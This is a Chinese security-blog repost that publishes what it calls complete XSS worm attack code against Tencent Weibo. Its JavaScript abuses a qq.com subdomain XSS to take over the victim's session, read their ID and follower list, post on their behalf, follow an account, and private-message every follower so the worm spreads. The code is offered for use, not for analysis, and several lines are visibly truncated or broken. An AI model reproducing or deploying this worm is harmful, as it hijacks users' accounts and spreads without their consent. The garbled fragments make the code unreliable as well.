腾讯微博完整xss蠕虫攻击代码的实现

admin 2021年4月3日20:07:56评论136 views字数 2359阅读7分51秒阅读模式

by:PiaCa

之前写过一篇《腾讯微博XSS蠕虫可行性简单分析》,这里:http://www.t00ls.net/thread-16537-1-1.html。

那个时候是发现t.qq.com域下一处xss漏洞,大部分操作是不需要跨域的,利用起来很方便。不过这样的xss很少了,后来写了当qq.com其他子域下存在xss漏洞该如何利用的代码。

其实蠕虫攻击代码只是对xss漏洞利用的一种方法而已,其实还是能做好多事情的。

以下是腾讯微博完整xss蠕虫攻击代码,发出来大家交流交流,具体如何去发掘qq.com其他子域下的xss漏洞大家都有各自的方法的,哈哈!

//设置document.domain
document.domain = "qq.com";

//跨t.qq.com域
var tdiv = document.createElement("div");
tdiv.innerHTML = "";
document.body.appendChild(tdiv);

//POST发送数据
function post(url,data,sync,xmlHttp){
    xmlHttp.open("POST",url,sync);
    xmlHttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded;");
    xmlHttp.send(data);
}

//获得当前微博ID
function getowner(){
        url = "http://t.qq.com/asyn/home.php";
        xmlHttp.open("GET",url,false);
        xmlHttp.send();
        result = xmlHttp.responseText;
        return eval("(" + result + ")").info.user;
}

//发微博
function publish(){
        url = "http://t.qq.com/publish.php";
        data = "content=" + encodeURIComponent("bbb");
        post(url,data,true,xmlHttp);
}

//收听微博
function following(){
        url = "http://t.qq.com/follow.php";
        data = "u=xxxxx&r=1309401828421&veriCode=";
        post(url,data,true,crossTdomain);
}

//获取所有听众ID
function getfollower(){
        url = "http://t.qq.com/" + owner + "/follower";
        xmlHttp.open("GET",url,false);
        xmlHttp.send();
        result = xmlHttp.responseText;
        var followers = [];
        var patrn = /@(.+?))">
        while((follower = patrn.exec(result)) != null){
                followers.push(follower[1]);
        }
        return followers;
}

//发私信
function msg(followers){
        crossPMdomain = document.getElementById("crossPMdomain").contentWindow;
        for (i=0;i
        {
                url = "http://pm.t.qq.com/cgi-bin/pm_mgr"
                data = "source=new&ptid=&roomid=&content=hi&fid=&target="+ followers[i] +"&func=send&ef=js&pmlang=zh_CN";
                pmxmlHttp = crossPMdomain.xmlHttp();
                post(url,data,false,pmxmlHttp);
        }
}

function main(){

        //获取t.qq.com域下xmlHttp()函数
        xmlHttp = crossTdomain.xmlHttp();

        //调用功能函数
        owner = getowner();
        publish();
        followers = getfollower();

        //跨pm.t.qq.com域,发送私信
        var pmdiv = document.createElement("div");
        pmdiv.innerHTML = "";
        document.body.appendChild(pmdiv);
}

文章来源于lcx.cc:腾讯微博完整xss蠕虫攻击代码的实现

相关推荐: 【文章】10.4 加密数据存储、驱动器级加密

10.4 加密数据存储     用于存储的加密数据、以后可以在Alice-Bob模式里检查。Alice仍可向 Bob发送消息,只是此处的“Bob”是某时间后的Alice。然而,该问题又有本质的不同。     在通信信道里,传输中的数据并没有价值。如果Bob不接…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日20:07:56
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   腾讯微博完整xss蠕虫攻击代码的实现https://cn-sec.com/archives/325666.html

发表评论

匿名网友 填写信息